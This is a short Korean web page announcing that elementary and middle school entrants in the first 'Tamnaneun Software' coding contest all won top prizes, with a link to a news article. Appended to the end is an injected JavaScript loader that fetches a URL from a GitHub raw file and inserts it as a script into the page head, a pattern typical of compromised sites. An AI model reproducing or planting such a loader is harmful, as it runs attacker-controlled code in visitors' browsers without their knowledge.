제1회 탐나는 소프트웨어 코딩대회

탐나는 소프트웨어 코딩 대회 결과
제1회 탐나는 소프트웨어 코딩 대회에 참가한 초등부와 중등부 친구들이 모두 최우수상을 받았습니다.
모두 축하드립니다.
자세한 내용은 http://www.newsje.com/news/articleView.html?idxno=205542
;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});